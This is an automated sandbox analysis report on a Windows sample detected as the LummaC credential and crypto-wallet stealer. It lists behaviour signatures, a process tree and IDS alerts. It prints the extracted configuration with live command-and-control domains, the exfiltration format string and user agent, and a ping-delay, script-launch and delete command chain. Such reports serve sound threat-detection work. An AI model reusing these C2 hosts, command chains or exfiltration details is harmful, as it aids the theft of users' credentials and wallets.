Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1546641
MD5:6fdf2cdf68ab1880aa76e7938e241fa3
SHA1:affc9a0aea771ad101357cc728951f5938b5e4e6
SHA256:e61ce90df13402909985f5312fdef798736eb10e0b5b6b280fb826538e7a597a
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • file.exe (PID: 7388 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6FDF2CDF68AB1880AA76E7938E241FA3)
    • file.tmp (PID: 7404 cmdline: "C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp" /SL5="$40476,2820349,845824,C:\Users\user\Desktop\file.exe" MD5: 945EC37B9971C5E9F26FAFAD6EDFD46E)
      • file.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\file.exe" /VERYSILENT MD5: 6FDF2CDF68AB1880AA76E7938E241FA3)
        • file.tmp (PID: 7456 cmdline: "C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp" /SL5="$2047E,2820349,845824,C:\Users\user\Desktop\file.exe" /VERYSILENT MD5: 945EC37B9971C5E9F26FAFAD6EDFD46E)
          • cmd.exe (PID: 7520 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7572 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 7580 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 7616 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7672 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 7680 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 7716 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7768 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 7776 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 7812 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7864 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 7872 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 7908 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7956 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 7964 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 8008 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 8060 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 8068 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • Updater.exe (PID: 8104 cmdline: "C:\Users\user\AppData\Local\hangbird\\Updater.exe" "C:\Users\user\AppData\Local\hangbird\\caliculus.csv" MD5: 3F58A517F1F4796225137E7659AD2ADB)
            • cmd.exe (PID: 7424 cmdline: "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\bYrIyAT.a3x && del C:\ProgramData\\bYrIyAT.a3x MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • PING.EXE (PID: 7380 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
              • Updater.exe (PID: 7592 cmdline: updater.exe C:\ProgramData\\bYrIyAT.a3x MD5: 3F58A517F1F4796225137E7659AD2ADB)
                • MSBuild.exe (PID: 7552 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["goalyfeastz.site", "dilemmadu.site", "seallysl.site", "authorisev.site", "contemteny.site", "faulteyotk.site", "opposezmny.site", "servicedny.site"], "Build id": "MkfS5f--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: Updater.exe PID: 7592JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      Process Memory Space: MSBuild.exe PID: 7552JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

          System Summary

          barindex
          Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 104.21.85.194, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7552, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49739
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T10:50:56.091683+010020283713Unknown Traffic192.168.2.449739104.21.85.194443TCP
          2024-11-01T10:50:56.931094+010020283713Unknown Traffic192.168.2.449741104.21.85.194443TCP
          2024-11-01T10:50:58.181978+010020283713Unknown Traffic192.168.2.449743104.21.85.194443TCP
          2024-11-01T10:50:59.505004+010020283713Unknown Traffic192.168.2.449749104.21.85.194443TCP
          2024-11-01T10:51:00.724341+010020283713Unknown Traffic192.168.2.449755104.21.85.194443TCP
          2024-11-01T10:51:02.250998+010020283713Unknown Traffic192.168.2.449766104.21.85.194443TCP
          2024-11-01T10:51:03.970713+010020283713Unknown Traffic192.168.2.449777104.21.85.194443TCP
          2024-11-01T10:51:07.061291+010020283713Unknown Traffic192.168.2.449793104.21.85.194443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T10:50:56.269364+010020546531A Network Trojan was detected192.168.2.449739104.21.85.194443TCP
          2024-11-01T10:50:57.391364+010020546531A Network Trojan was detected192.168.2.449741104.21.85.194443TCP
          2024-11-01T10:51:07.534926+010020546531A Network Trojan was detected192.168.2.449793104.21.85.194443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T10:50:56.269364+010020498361A Network Trojan was detected192.168.2.449739104.21.85.194443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T10:50:57.391364+010020498121A Network Trojan was detected192.168.2.449741104.21.85.194443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T10:50:56.091683+010020570721Domain Observed Used for C2 Detected192.168.2.449739104.21.85.194443TCP
          2024-11-01T10:50:56.931094+010020570721Domain Observed Used for C2 Detected192.168.2.449741104.21.85.194443TCP
          2024-11-01T10:50:58.181978+010020570721Domain Observed Used for C2 Detected192.168.2.449743104.21.85.194443TCP
          2024-11-01T10:50:59.505004+010020570721Domain Observed Used for C2 Detected192.168.2.449749104.21.85.194443TCP
          2024-11-01T10:51:00.724341+010020570721Domain Observed Used for C2 Detected192.168.2.449755104.21.85.194443TCP
          2024-11-01T10:51:02.250998+010020570721Domain Observed Used for C2 Detected192.168.2.449766104.21.85.194443TCP
          2024-11-01T10:51:03.970713+010020570721Domain Observed Used for C2 Detected192.168.2.449777104.21.85.194443TCP
          2024-11-01T10:51:07.061291+010020570721Domain Observed Used for C2 Detected192.168.2.449793104.21.85.194443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T10:50:55.462070+010020570711Domain Observed Used for C2 Detected192.168.2.4518681.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T10:51:02.968026+010020480941Malware Command and Control Activity Detected192.168.2.449766104.21.85.194443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-01T10:51:03.974381+010028438641A Network Trojan was detected192.168.2.449777104.21.85.194443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 36.2.MSBuild.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["goalyfeastz.site", "dilemmadu.site", "seallysl.site", "authorisev.site", "contemteny.site", "faulteyotk.site", "opposezmny.site", "servicedny.site"], "Build id": "MkfS5f--"}
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.8% probability
          Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmpString decryptor: servicedny.site
          Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmpString decryptor: authorisev.site
          Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmpString decryptor: faulteyotk.site
          Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmpString decryptor: dilemmadu.site
          Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmpString decryptor: contemteny.site
          Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmpString decryptor: goalyfeastz.site
          Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmpString decryptor: opposezmny.site
          Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmpString decryptor: seallysl.site
          Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmpString decryptor: authorisev.site
          Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
          Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
          Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
          Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
          Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
          Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmpString decryptor: MkfS5f--
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_0041D5AF CryptUnprotectData,36_2_0041D5AF
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49749 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49755 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49760 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49766 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49777 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49793 version: TLS 1.2
          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdb source: file.exe, is-E0D1D.tmp.3.dr
          Source: Binary string: wntdll.pdbUGP source: Updater.exe, 00000023.00000003.2224707416.0000000004201000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2228529906.000000000427C000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2226347479.00000000040E0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdbz source: file.exe, is-E0D1D.tmp.3.dr
          Source: Binary string: wntdll.pdb source: Updater.exe, 00000023.00000003.2224707416.0000000004201000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2228529906.000000000427C000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2226347479.00000000040E0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B8E180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,35_2_00B8E180
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B9A187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,35_2_00B9A187
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B9A2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,35_2_00B9A2E4
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B9A66E FindFirstFileW,Sleep,FindNextFileW,FindClose,35_2_00B9A66E
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B9686D FindFirstFileW,FindNextFileW,FindClose,35_2_00B9686D
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B8E9BA GetFileAttributesW,FindFirstFileW,FindClose,35_2_00B8E9BA
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B974F0 FindFirstFileW,FindClose,35_2_00B974F0
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B97591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,35_2_00B97591
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B8DE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,35_2_00B8DE32
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_013F50B5 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,35_2_013F50B5
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_013F51BD FindFirstFileA,GetLastError,35_2_013F51BD
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_013F29E5 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,35_2_013F29E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h]36_2_00410130
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [ebx], dl36_2_00410130
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h]36_2_00410130
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edx, ecx36_2_00410130
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edx, ecx36_2_00410130
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [eax]36_2_004441F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edx, ecx36_2_0044137E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edx, ecx36_2_004413D5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp eax36_2_0041D5AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edx, eax36_2_0043A97E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [eax+ebx*8], 7CDE1E50h36_2_0043A97E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h36_2_0043A97E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [ebx], cl36_2_0042EB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, eax36_2_0042EB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea edx, dword ptr [eax-80h]36_2_0042EB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx+0000009Ch]36_2_0042EB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+068F7B6Bh]36_2_0042EB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [esi+04h], eax36_2_0042EB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [ebx], al36_2_0042EB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [eax+ebx], 30303030h36_2_00401000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [eax+ebx], 20202020h36_2_00401000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h36_2_0043B170
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h]36_2_00410118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [ebx], dl36_2_00410118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h]36_2_00410118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edx, ecx36_2_00410118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edx, ecx36_2_00410118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp edx36_2_004431D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl36_2_004431D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-7DC9E524h]36_2_004241E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp edx36_2_00442EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl36_2_00442EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp edx36_2_004432C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl36_2_004432C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [eax+ebx], 00000030h36_2_004012D5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, ebx36_2_00421333
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [eax]36_2_00444380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp edx36_2_004433B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl36_2_004433B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h36_2_0042E400
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx+0000009Ch]36_2_0042F4DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+068F7B6Bh]36_2_0042F4DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [esi+04h], eax36_2_0042F4DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [ebx], al36_2_0042F4DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ebx, eax36_2_0040D500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [ebx], ax36_2_0041F510
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl36_2_0041F510
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-67BC38F0h]36_2_00441648
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]36_2_0043C6D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], cx36_2_0041C6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+52B71DE2h]36_2_00441720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then xor byte ptr [ecx+ebx], bl36_2_00443720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx-09A22FB6h]36_2_0043F7E0
